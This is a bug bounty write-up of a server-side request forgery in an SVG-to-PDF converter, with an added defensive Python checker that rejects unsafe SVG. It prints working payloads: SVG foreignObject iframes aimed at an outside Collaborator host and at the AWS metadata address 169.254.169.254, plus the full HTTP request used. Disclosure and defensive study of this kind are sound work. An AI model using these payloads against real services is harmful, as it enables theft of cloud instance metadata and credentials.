SSRF in PDF Renderer using SVG

Tomi
May 19, 2021

Some information in this post, such as the target URL, endpoint, and several other details, has been modified to protect the privacy of the program.

A while ago, I had the opportunity to do bug hunting in one of the private programs on Bugcrowd. The program covers a complex application with many features; one of them converts SVG input into PDF, JPG, and PNG files.

I. Initial Test - Sending HTML Tag

When I found a feature that creates PDFs from user-supplied data, I immediately tried an SSRF attack by replacing the SVG code sent to the server with HTML containing an iframe tag pointed at my Burp Collaborator.

POST /convert HTTP/2
Host: target.com
Cookie: -
Content-Length: -
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Dnt: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqBdAsEtYaBjTArl3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,eu;q=0.6,ms;q=0.5
Connection: close

------WebKitFormBoundaryqBdAsEtYaBjTArl3
Content-Disposition: form-data; name="svg"


<iframe src="http://169.254.169.254/latest/meta-data/"></iframe>
------WebKitFormBoundaryqBdAsEtYaBjTArl3--

But unfortunately, the server responded with an error message.

{"message": "Error when converting data."}

It looks like the server can only process input that is a valid SVG file.

II. Embedding HTML using foreignObject

After some googling, I found that HTML can be embedded inside SVG using an element named foreignObject.

The <foreignObject> SVG element includes elements from a different XML namespace. In the context of a browser, it is most likely (X)HTML.

Source: https://developer.mozilla.org/en-US/docs/Web/SVG/Element/foreignObject

So I changed the payload to be like this:

<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
  <g>
    <foreignObject width="800" height="500">
      <body xmlns="http://www.w3.org/1999/xhtml">
        <iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>
      </body>
    </foreignObject>
  </g>
</svg>

After getting a hit on the Burp Collaborator client, I checked the IP address it came from, which showed that the application runs on Amazon Web Services, and the User-Agent showed that the SVG is rendered with PhantomJS.

So I modified the payload to exfiltrate the metadata of the AWS instance.

<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
  <g>
    <foreignObject width="800" height="500">
      <body xmlns="http://www.w3.org/1999/xhtml">
        <iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
      </body>
    </foreignObject>
  </g>
</svg>

And metadata was successfully obtained.
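A defensive counterpart, added here and not part of the original post: an allow-list check the converting service could run on submitted SVG before handing it to the renderer. It flags the foreignObject element, any element outside the SVG namespace (such as the XHTML body and iframe above), and any href, xlink:href or src that is not a same-document reference; the sample inputs and the host collaborator.example are constructed.

```python
"""Allow-list check for user-supplied SVG before it reaches a PDF renderer.
Added example, not code from the post. xml.etree is used for brevity; in production
parse untrusted XML with defusedxml so entity-expansion attacks are blocked too."""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
# Elements that embed foreign markup or run script; a drawing never needs them.
DENIED_ELEMENTS = {"foreignObject", "script"}
# Attributes that make the renderer load something; only same-document "#id" passes.
URL_ATTRS = {"href", XLINK_HREF, "src"}
CSS_URL = re.compile(r"url\s*\(", re.IGNORECASE)

# Constructed sample with the same shape as the payload in the post (placeholder host).
MALICIOUS_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" width="800" height="500"><g>'
    '<foreignObject width="800" height="500"><body xmlns="http://www.w3.org/1999/xhtml">'
    '<iframe src="http://collaborator.example/"></iframe></body></foreignObject></g></svg>'
)
BENIGN_SVG = ('<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
              '<rect id="r" width="10" height="10" fill="#00f"/><use href="#r"/></svg>')


def check_svg(svg_text: str) -> list[str]:
    """Return the reasons the document must be rejected; an empty list means accept."""
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    problems = []
    for el in root.iter():
        # ElementTree reports tags as '{namespace}name'; split that apart.
        ns, _, name = el.tag[1:].partition("}") if el.tag.startswith("{") else ("", "", el.tag)
        # Renderers treat un-namespaced elements as SVG, so only foreign namespaces are flagged.
        if ns not in (SVG_NS, ""):
            problems.append(f"<{name}> is outside the SVG namespace ({ns})")
        if name in DENIED_ELEMENTS:
            problems.append(f"<{name}> is not allowed")
        for attr, value in el.attrib.items():
            if attr in URL_ATTRS and not value.strip().startswith("#"):
                problems.append(f"<{name}> {attr} is not a same-document reference")
            if attr == "style" and CSS_URL.search(value):
                problems.append(f"<{name}> style attribute loads a resource via url()")
    return problems


if __name__ == "__main__":
    print(check_svg(MALICIOUS_SVG))  # four findings, starting with foreignObject
    print(check_svg(BENIGN_SVG))     # []
```

Rejecting the document is only one layer; the renderer host should additionally be denied egress to link-local and internal addresses so a bypass in the parser does not reach the instance metadata service.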

Figure 1 - Retrieving AWS Metadata via PDF File

I immediately reported this finding; it was marked as P1 and rewarded with $2,150.